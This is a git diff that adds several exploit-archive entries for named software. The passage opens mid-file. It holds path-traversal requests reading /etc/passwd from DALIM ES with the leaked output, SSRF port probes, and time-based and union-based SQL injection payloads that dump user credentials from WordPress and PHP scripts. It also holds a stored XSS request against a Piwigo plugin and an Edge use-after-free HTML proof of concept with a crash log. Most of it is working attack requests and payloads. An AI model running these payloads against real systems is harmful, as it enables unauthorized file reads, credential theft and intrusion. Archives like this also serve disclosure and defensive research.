+sync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+--snip--
+
+
+----------------------------------------------------
+2. PoC request for Login.jsp, orgUnitName parameter:
+----------------------------------------------------
+
+~ curl -v http://TARGET/Esprit/ES/Login\?orgUnitName\=../../../../../../../../../etc/passwd
+*   Trying TARGET...
+* TCP_NODELAY set
+* Connected to TARGET (TARGET) port 80 (#0)
+> GET /Esprit/ES/Login?orgUnitName=../../../../../../../../../etc/passwd HTTP/1.1
+> Host: TARGET
+> User-Agent: curl/7.51.0
+> Accept: */*
+> 
+< HTTP/1.1 200 OK
+< Date: Thu, 15 Jun 2017 02:19:31 GMT
+< Server: Server
+< Content-Type: text/html;charset=UTF-8
+< Set-Cookie: JSESSIONID=0ECF83AA0D337B5D942B5C164B172051; Path=/Esprit; HttpOnly
+< Transfer-Encoding: chunked
+< 
+
+--snip--
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+--snip--
+
+
+---------------------------------------
+3. PoC request for log, file parameter:
+---------------------------------------
+
+~ curl http://TARGET:8080/dalimws/log\?file\=../../../../../../../etc/passwd\&len\=10000\&download\=true -v
+*   Trying TARGET...
+* TCP_NODELAY set
+* Connected to TARGET (TARGET) port 8080 (#0)
+> GET /dalimws/log?file=../../../../../../../etc/passwd&len=10000&download=true HTTP/1.1
+> Host: TARGET:8080
+> User-Agent: curl/7.51.0
+> Accept: */*
+> 
+< HTTP/1.1 200 OK
+< Content-Disposition: attachment; filename=../../../../../../../etc/passwd
+< Content-Type: text/plain
+< Content-Length: 10000
+< Date: Thu, 15 Jun 2017 02:20:17 GMT
+< Server: Server
+< 
+
+--snip--
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+--snip--
+
+
+---------------------------------------
+4. PoC request for log, file parameter:
+---------------------------------------
+
+POST /dalimws/log HTTP/1.1
+Host: TARGET:8080
+Content-Length: 116
+User-Agent: H2O
+Content-type: application/x-www-form-urlencoded
+Accept: */*
+Accept-Language: en-US,en;q=0.8,mk;q=0.6
+Connection: close
+
+file=../../../../../../../symlnks/common/tomcat7.0/conf/web.xml&len=1000000&XUI_SessionID=LOGReq&responseWiter=XML
+
+Response:
+
+--snip--
+    <!-- The mapping for the default servlet -->
+    <servlet-mapping>
+        <servlet-name>default</servlet-name>
+        <url-pattern>/</url-pattern>
+    </servlet-mapping>
+
+    <!-- The mappings for the JSP servlet -->
+    <servlet-mapping>
+        <servlet-name>jsp</servlet-name>
+        <url-pattern>*.jsp</url-pattern>
+        <url-pattern>*.jspx</url-pattern>
+    </servlet-mapping>
+--snip--
diff --git a/platforms/jsp/webapps/42439.txt b/platforms/jsp/webapps/42439.txt
new file mode 100755
index 000000000..c5cd9ddc9
--- /dev/null
+++ b/platforms/jsp/webapps/42439.txt
@@ -0,0 +1,130 @@
+DALIM SOFTWARE ES Core 5.0 build 7184.1 Server-Side Request Forgery
+
+
+Vendor: Dalim Software GmbH
+Product web page: https://www.dalim.com
+Affected version: ES/ESPRiT 5.0 (build 7184.1)
+                                (build 7163.2)
+                                (build 7163.0)
+                                (build 7135.0)
+                                (build 7114.1)
+                                (build 7114.0)
+                                (build 7093.1)
+                                (build 7093.0)
+                                (build 7072.0)
+                                (build 7051.3)
+                                (build 7051.1)
+                                (build 7030.0)
+                                (build 7009.0)
+                                (build 6347.0)
+                                (build 6326.0)
+                                (build 6305.1)
+                                (build 6235.9)
+                                (build 6172.1)
+                  ES/ESPRiT 4.5 (build 6326.0)
+                                (build 6144.2)
+                                (build 5180.2)
+                                (build 5096.0)
+                                (build 4314.3)
+                                (build 4314.0)
+                                (build 4146.4)
+                                (build 3308.3)
+                  ES/ESPRiT 4.0 (build 4202.0)
+                                (build 4132.1)
+                                (build 2235.0)
+                  ES/ESPRiT 3.0
+
+Summary: ES is the new Enterprise Solution from DALIM SOFTWARE built
+from the successful TWIST, DIALOGUE and MISTRAL product lines. The ES
+Core is the engine that can handle project tracking, JDF device workflow,
+dynamic user interface building, volume management. Each ES installation
+will have different features, depending on the license installed: online
+approval, prepress workflow, project tracking, imposition management...
+
+ES is a collaborative digital asset production and management platform,
+offering services ranging from online approval to web-based production
+environment for all participants of the production cycle, including brand
+owners, agencies, publishers, pre-media, printers and multichannel service
+provider. ES lets users plan, execute and control any aspect of media
+production, regardless of the final use of the output (print, web, ebook,
+movie, and others). It ensures productivity and longterm profitability.
+
+
+Desc: A server-side request forgery (SSRF) vulnerability exists in the
+DALIM Web Service management interface within the XUI servlet functionality.
+The DALIM web services are a set of tools used by the different DALIM SOFTWARE
+applications: TWIST, MISTRAL and ES. It provides file sharing capabilities,
+JDF devices, JDF controller, and job spooling management. The application
+parses user supplied data in the GET parameter 'screen' to construct a page
+request to the service. Since no validation is carried out on the parameter,
+an attacker can specify an external domain and force the application to make
+a HTTP request to an arbitrary destination host. This can be used by an external
+attacker for example to bypass firewalls and initiate a service and network
+enumeration on the internal network through the affected application.
+
+Tested on: Red Hat Enterprise Linux Server release 7.3 (Maipo)
+           CentOS 7
+           Apache Tomcat/7.0.78
+           Apache Tomcat/7.0.67
+           Apache Tomcat/7.0.42
+           Apache Tomcat/6.0.35
+           Apache-Coyote/1.1
+           Java/1.7.0_80
+           Java/1.6.0_21
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2017-5428
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5428.php
+
+
+15.06.2017
+
+--
+
+
+1. Check for open port:
+-----------------------
+
+GET /dalimws/xui?screen=http://127.0.0.1:8888 HTTP/1.1
+Host: 192.168.1.2:8080
+Accept: */*
+Accept-Language: en
+Connection: close
+
+<Error message="java.net.ConnectException: Connection refused org.w3c.dom.DOMException: java.net.ConnectException: Connection refused&#10;&#9;at
+
+
+2. Check for open port:
+-----------------------
+
+GET /dalimws/xui?screen=http://127.0.0.1:8080 HTTP/1.1
+Host: 192.168.1.2:8080
+Accept: */*
+Accept-Language: en
+Connection: close
+
+<Error message="org.xml.sax.SAXParseException: The reference to entity "ctype" must end with the ';' delimiter. org.w3c.dom.DOMException: org.xml.sax.SAXParseException: The
+
+
+3. Observe server-side request:
+-------------------------------
+
+GET /dalimws/xui?screen=http://192.168.1.55 HTTP/1.1
+Host: 192.168.1.2:8080
+Accept-Language: en-US,en;q=0.8,mk;q=0.6
+Connection: close
+
+
+Request from 192.168.1.2 to 192.168.1.55 observed:
+
+GET / HTTP/1.1
+Cache-Control: no-cache
+Pragma: no-cache
+User-Agent: SSRF/Test_1.4
+Host: 192.168.1.55
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: keep-alive
diff --git a/platforms/php/webapps/42291.txt b/platforms/php/webapps/42291.txt
new file mode 100755
index 000000000..86e73c025
--- /dev/null
+++ b/platforms/php/webapps/42291.txt
@@ -0,0 +1,59 @@
+#####################################
+Exploit Title: SQL Injection In WatuPRO (WordPress Plugin to Create Exams, Tests and Quizzes)
+Exploit Author: Manich  Koomsusi
+Date: 03-07-2017
+Software: WatuPRO
+Version: 5.5.1
+Website: http://calendarscripts.info/watupro/
+Tested on: WordPress 4.7.5
+Software Link: https://1drv.ms/u/s!AhfkvGaDTn1bmgHSj9u_jQX8iME0
+CVE: CVE-2017-9834
+#####################################
+
+Description
+==================================
+SQL Injection in WatuPRO WordPress Plugin for create exams, Tests and Quizzes allow the attacker dump the database contents.
+
+Vulnerability
+==================================
+This plugin sending quizzes to the server with “watupro_questions” parameter not sanitize before take SQL statement.
+
+Proof of concept
+==================================
+Take exams or quizzes and submit to the server in POST method
+
+Payload : “1:1,2) AND 4761=IF((41=41),SLEEP(5),4761) AND (4547=4547”    the server delay response time around ~5 second.
+Payload : “1:1,2) AND 4761=IF((41=41),SLEEP(0),4761) AND (4547=4547”    the server not delay response time.
+
+############
+POST /pt/wordpress/wp-admin/admin-ajax.php HTTP/1.1
+Content-Length: 292
+Accept-Language: en-US,en;q=0.5
+Host: 192.168.5.189
+Accept: text/plain, */*; q=0.01
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
+DNT: 1
+Connection: close
+X-Requested-With: XMLHttpRequest
+Referer: http://192.168.5.189/pt/wordpress/
+Cookie: wordpress_155e4542aeb2c66021dab6903e684bdb=admin%7C1497811093%7CaY85tN6gH7x8iYCzPETIcEJYYyn6tZlzJnbhTZLgZYX%7C475cf68a551a0db99cd991e958fc949bfe8f2a833bf39d0534ce25d29c11a9b8; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_155e4542aeb2c66021dab6903e684bdb=admin%7C1497811093%7CaY85tN6gH7x8iYCzPETIcEJYYyn6tZlzJnbhTZLgZYX%7C61ef1ea8c998118da9dd01d5f650dc0806f8bfbb1d5f28fdbb626f062bcebbcd; wp-settings-time-1=1497748191; PHPSESSID=rh7v9qt9ibdlioth3cecr5gg94
+Content-Type: application/x-www-form-urlencoded
+action=watupro_submit&quiz_id=1&question_id%5B%5D=1&watupro_questions=1:1,2)%20AND%204761%3dIF((41%3d41),SLEEP(5),4761)%20AND%20(4547%3d4547&post_id=5&answer-1%5B%5D=1&question_1_hints=&taker_email=hacker%40admin.com<http://40admin.com>&h_app_id=0.24749700+1497748201&start_time=2017-06-18+01%3A10%3A01&in_ajax=1
+#############
+
+
+Mitigations
+==================================
+Upgrade to version 5.5.3.7 or later.
+
+Timeline
+==================================
+2017-06-19: Discovered the bug
+2017-06-19: Reported to vendor
+2017-06-19: First response from vendor saying software it fixed. But the vendor fix not properly
+2017-06-20: Version 5.5.3.7 released “Fixed issue with input validate.”
+2017-07-03: Advisory published
+
+Discovered By:
+=====================
+Manich  Koomsusi
diff --git a/platforms/php/webapps/42440.txt b/platforms/php/webapps/42440.txt
new file mode 100755
index 000000000..e51589231
--- /dev/null
+++ b/platforms/php/webapps/42440.txt
@@ -0,0 +1,35 @@
+# # # # #
+# Exploit Title: WebFile Explorer 1.0 - Arbitrary File Download
+# Dork: N/A
+# Date: 09.08.2017
+# Vendor Homepage : http://speicher.host/
+# Software Link: https://codecanyon.net/item/webfile-explorer/20366192/
+# Demo: http://speicher.host/envato/codecanyon/demo/web-file-explorer/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The security obligation allows an attacker to arbitrary download files..
+#
+# Vulnerable Source:
+# 1	.............
+# 2	$file = $_GET['id'];
+# 3	
+# 4	if (file_exists($file)) {
+# 5	    header('Content-Description: File Transfer');
+# 6	    header('Content-Type: application/octet-stream');
+# 7	    header('Content-Disposition: attachment; filename="'.basename($file).'"');
+# 8	    header('Expires: 0');
+# 9	    header('Cache-Control: must-revalidate');
+# 10 .............
+# Proof of Concept:
+# http://localhost/[PATH]/web-file-explorer/download.php?id=WebExplorer/[FILE]
+# 
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/42441.txt b/platforms/php/webapps/42441.txt
new file mode 100755
index 000000000..47b6fdadd
--- /dev/null
+++ b/platforms/php/webapps/42441.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: ImageBay 1.0 - SQL Injection
+# Dork: N/A
+# Date: 10.08.2017
+# Vendor Homepage : http://www.scriptfolder.com/
+# Software Link: http://www.scriptfolder.com/imagebay-publish-or-share-photography-and-pictures/
+# Demo: http://imagebay.scriptfolder.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+# http://localhost/[PATH]/picture.php?pid=[SQL]
+# -22++/*!11111union*/+/*!11111select*/+/*!11111concat*/(username,0x3a,password),0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232+from+users--+-
+# http://localhost/[PATH]/updaterate.php?id=[SQL]
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42442.txt b/platforms/php/webapps/42442.txt
new file mode 100755
index 000000000..29987e119
--- /dev/null
+++ b/platforms/php/webapps/42442.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: GIF Collection 2.0 - SQL Injection
+# Dork: N/A
+# Date: 10.08.2017
+# Vendor Homepage : http://www.scriptfolder.com/
+# Software Link: http://www.scriptfolder.com/scriptfolder-gif-collection-2-0/
+# Demo: http://gif2.scriptfolder.com/
+# Version: 2.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+# http://localhost/[PATH]/gifs.php?id=[SQL]
+# -27++/*!11111union*/+/*!11111select*/+/*!11111concat*/(username,0x3a,password),0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137+from+users--+-
+# http://localhost/[PATH]/updaterate.php?id=[SQL]
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42443.txt b/platforms/php/webapps/42443.txt
new file mode 100755
index 000000000..d4fc4dda7
--- /dev/null
+++ b/platforms/php/webapps/42443.txt
@@ -0,0 +1,99 @@
+# Exploit Title: Piwigo plugin User Tag , Persistent XSS
+# Date: 10 Aug, 2017
+# Extension Version: 0.9.0
+# Software Link: http://piwigo.org/basics/downloads
+# Extension link : http://piwigo.org/ext/extension_view.php?eid=441
+# Exploit Author: Touhid M.Shaikh
+# Contact: http://twitter.com/touhidshaikh22
+# Website: http://touhidshaikh.com/
+# Category: webapps
+
+
+######## Description ########
+<!--
+    What is Piwigo ?
+    Piwigo is photo gallery software for the web, built by an active
+community of users and developers.Extensions make Piwigo easily
+customizable.Piwigo is a free and open source.
+
+    User Tag Extension in piwigo.
+    This plugin extends piwigo with the function to Allow visitors to add
+tags to photos.
+
+
+
+############ Requrment ##############
+
+Admin Must allow to user or guest for a tag in User Tag plugin option.
+
+
+######## Attact Description  ########
+<!--
+
+     User Tag Extension provides additional function on photo page for the
+user to tag any name of that image.
+
+
+NOTE: "test.touhidshaikh.com" this domain not registered on the internet.
+This domain host on local machine.
+
+==>START<==
+Any guest visitor or registered user can perform this.
+
+User Tag Extension adds an additional field(Keyword) on photo pages that
+let you tag a User Tag on the picture for visitor and registered user.
+
+click on that Field after that fill input text box with malicious code
+javascript and press Enter its stored as a User Tag keyword.
+
+Your Javascript Stored in Server's Database and execute every time when any
+visitor visit that photo.
+
+
+NOte: This is also executed in admin's dashboard when admin visit keyword
+page.
+
+-->
+
+######## Proof of Concept ########
+
+
+ *****Request*****
+
+POST /ws.php?format=json&method=user_tags.tags.update HTTP/1.1
+Host: test.touhidshaikh.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101
+Firefox/54.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-GB,hi;q=0.8,ar;q=0.5,en;q=0.3
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://test.touhidshaikh.com/picture.php?/4/category/1
+Content-Length: 83
+Cookie: _ga=GA1.2.392572598.1501252105; pwg_id=gsf3gp640oupaer3cjpnl22sr0
+Connection: close
+
+image_id=4&referer=picture.php%3F%2F4%2Fcategory%2F1&tags=<script>prompt()</script>
+
+**************************************************
+
+******Response********
+HTTP/1.1 200 OK
+Date: Thu, 10 Aug 2017 11:36:24 GMT
+Server: Apache/2.4.27 (Debian)
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 46
+Connection: close
+Content-Type: text/plain; charset=utf-8
+
+{"stat":"ok","result":{"info":"Tags updated"}}
+
+****************************************************
+
+
+####################################################
+
+
+Greetz: Thank You, All my Friends who support me. ;)
\ No newline at end of file
diff --git a/platforms/win_x86-64/dos/42445.html b/platforms/win_x86-64/dos/42445.html
new file mode 100755
index 000000000..5e47b9289
--- /dev/null
+++ b/platforms/win_x86-64/dos/42445.html
@@ -0,0 +1,336 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1255
+
+There is a use-after free vulnerability in Microsoft Edge that can lead to memory disclosure. The vulnerability has been confirmed on Windows 10 Enterprise 64-bit (OS version 1607, OS build 14393.1198), Microsoft Edge 38.14393.1066.0, Microsoft EdgeHTML 14.14393.
+
+PoC:
+
+==========================================
+-->
+
+<!-- saved from url=(0014)about:internet -->
+<script>
+var n = 0;
+function go() {
+  document.addEventListener("DOMNodeRemoved", eventhandler);
+  eventhandler();
+}
+function eventhandler() {
+  n++; if(n==5) return; //prevent going into an infinite recursion
+  t.defaultValue = "aaaaaaaaaaaaaaaaaaaa";
+  f.reset();
+}
+</script>
+<body onload=go()>
+<form id="f">
+<textarea id="t">aaa</textarea>
+
+<!--
+=========================================
+
+This seems to be the same bug as https://bugs.chromium.org/p/project-zero/issues/detail?id=1076 only that one is in IE and this one is in Edge.
+
+I don't have symbols for the latest Edge after May update, so crash log doesn't make much sense but here it is anyway:
+
+=========================================
+
+(1618.1258): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\SYSTEM32\edgehtml.dll - 
+edgehtml!Ordinal125+0x6446c:
+00007ffe`843d615c 6641393e        cmp     word ptr [r14],di ds:000001fa`3389cfd4=????
+
+0:013> !heap -p -a 000001fa`3389cfd4
+    address 000001fa3389cfd4 found in
+    _DPH_HEAP_ROOT @ 1f20b961000
+    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
+                                1fa33116138:      1fa3389c000             2000
+    00007ffe9fb1b90b ntdll!RtlDebugReAllocateHeap+0x0000000000000047
+    00007ffe9fadcbfe ntdll!RtlpReAllocateHeapInternal+0x000000000008729e
+    00007ffe9fa55941 ntdll!RtlReAllocateHeap+0x0000000000000031
+    00007ffe845cc2fa edgehtml!CreateWebDriverAdapter+0x00000000000504ba
+    00007ffe845cbd74 edgehtml!CreateWebDriverAdapter+0x000000000004ff34
+    00007ffe8462fbb8 edgehtml!Ordinal107+0x0000000000056a48
+    00007ffe84d05143 edgehtml!Ordinal106+0x0000000000018e63
+    00007ffe845ab544 edgehtml!CreateWebDriverAdapter+0x000000000002f704
+    00007ffe846b0747 edgehtml!Ordinal107+0x00000000000d75d7
+    00007ffe84ae5c8f edgehtml!ClearPhishingFilterData+0x00000000000beeaf
+    00007ffe84792bb5 edgehtml!DllEnumClassObjects+0x0000000000043245
+    00007ffe83c41227 chakra!DllGetClassObject+0x0000000000001d97
+    00007ffe83c7a3d7 chakra!MemProtectHeapUnrootAndZero+0x00000000000038e7
+    00007ffe83aef541 chakra!JsProjectWinRTNamespace+0x0000000000046621
+    000001fa1cf7057e +0x000001fa1cf7057e
+
+0:013> r
+rax=0000000000000000 rbx=000001fa2d058a40 rcx=000001f212910000
+rdx=0000004d44824f5c rsi=0000000000000000 rdi=0000000000000000
+rip=00007ffe843d615c rsp=0000004d44824f10 rbp=0000004d44825010
+ r8=00000000ffffffff  r9=000001f212910000 r10=00007ffe85156fd0
+r11=000001f212841a90 r12=0000000000000000 r13=0000000000000014
+r14=000001fa3389cfd4 r15=000001f2128e8840
+iopl=0         nv up ei pl zr na po nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+edgehtml!Ordinal125+0x6446c:
+00007ffe`843d615c 6641393e        cmp     word ptr [r14],di ds:000001fa`3389cfd4=????
+
+0:013> k
+ # Child-SP          RetAddr           Call Site
+00 0000004d`44824f10 00007ffe`844bc561 edgehtml!Ordinal125+0x6446c
+01 0000004d`44826190 00007ffe`8459a535 edgehtml!Ordinal105+0x13631
+02 0000004d`448261e0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e6f5
+03 0000004d`44826340 00007ffe`84d03e81 edgehtml!Ordinal106+0x18f9e
+04 0000004d`448263c0 00007ffe`84447753 edgehtml!Ordinal106+0x17ba1
+05 0000004d`448263f0 00007ffe`8453341c edgehtml!Ordinal125+0xd5a63
+06 0000004d`448264e0 00007ffe`847afc55 edgehtml!GetWebPlatformObject+0xbb4c
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\SYSTEM32\chakra.dll - 
+07 0000004d`44826520 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x602e5
+08 0000004d`44826550 000001fa`1cf70641 chakra!DllGetClassObject+0x1d97
+09 0000004d`44826630 00007ffe`83cf90a3 0x000001fa`1cf70641
+0a 0000004d`448266c0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
+0b 0000004d`44826710 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
+0c 0000004d`44826770 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
+0d 0000004d`44826860 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
+0e 0000004d`448268d0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
+0f 0000004d`44826970 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
+10 0000004d`44826a00 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
+11 0000004d`44826aa0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
+12 0000004d`44826af0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
+13 0000004d`44826b30 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
+14 0000004d`44826cb0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
+15 0000004d`44826d30 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
+16 0000004d`44826e90 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
+17 0000004d`44826ed0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
+18 0000004d`448271a0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
+19 0000004d`448271f0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
+1a 0000004d`44827360 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
+1b 0000004d`448273a0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
+1c 0000004d`448274b0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
+1d 0000004d`44827610 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
+1e 0000004d`44827690 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
+1f 0000004d`448276c0 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
+20 0000004d`448277c0 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
+21 0000004d`44827800 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
+22 0000004d`44827840 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
+23 0000004d`44827870 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
+24 0000004d`44827950 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
+25 0000004d`44827a30 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
+26 0000004d`44827af0 00007ffe`83cf90a3 0x000001fa`1cf7057e
+27 0000004d`44827b80 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
+28 0000004d`44827bd0 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
+29 0000004d`44827c30 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
+2a 0000004d`44827d20 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
+2b 0000004d`44827d90 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
+2c 0000004d`44827e30 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
+2d 0000004d`44827ec0 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
+2e 0000004d`44827f60 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
+2f 0000004d`44827fb0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
+30 0000004d`44827ff0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
+31 0000004d`44828170 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
+32 0000004d`448281f0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
+33 0000004d`44828350 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
+34 0000004d`44828390 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
+35 0000004d`44828660 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
+36 0000004d`448286b0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
+37 0000004d`44828820 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
+38 0000004d`44828860 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
+39 0000004d`44828970 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
+3a 0000004d`44828ad0 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
+3b 0000004d`44828b50 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
+3c 0000004d`44828b80 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
+3d 0000004d`44828c80 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7
+3e 0000004d`44828cc0 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf
+3f 0000004d`44828d00 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245
+40 0000004d`44828d30 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97
+41 0000004d`44828e10 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7
+42 0000004d`44828ef0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621
+43 0000004d`44828fb0 00007ffe`83cf90a3 0x000001fa`1cf7057e
+44 0000004d`44829040 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013
+45 0000004d`44829090 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73
+46 0000004d`448290f0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c
+47 0000004d`448291e0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56
+48 0000004d`44829250 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9
+49 0000004d`448292f0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1
+4a 0000004d`44829380 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac
+4b 0000004d`44829420 00007ffe`84650b98 edgehtml!Ordinal107+0x77add
+4c 0000004d`44829470 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28
+4d 0000004d`448294b0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7
+4e 0000004d`44829630 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7
+4f 0000004d`448296b0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a
+50 0000004d`44829810 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4
+51 0000004d`44829850 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1
+52 0000004d`44829b20 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876
+53 0000004d`44829b70 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132
+54 0000004d`44829ce0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732
+55 0000004d`44829d20 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9
+56 0000004d`44829e30 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d
+57 0000004d`44829f90 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e
+58 0000004d`4482a010 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a
+59 0000004d`4482a040 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704
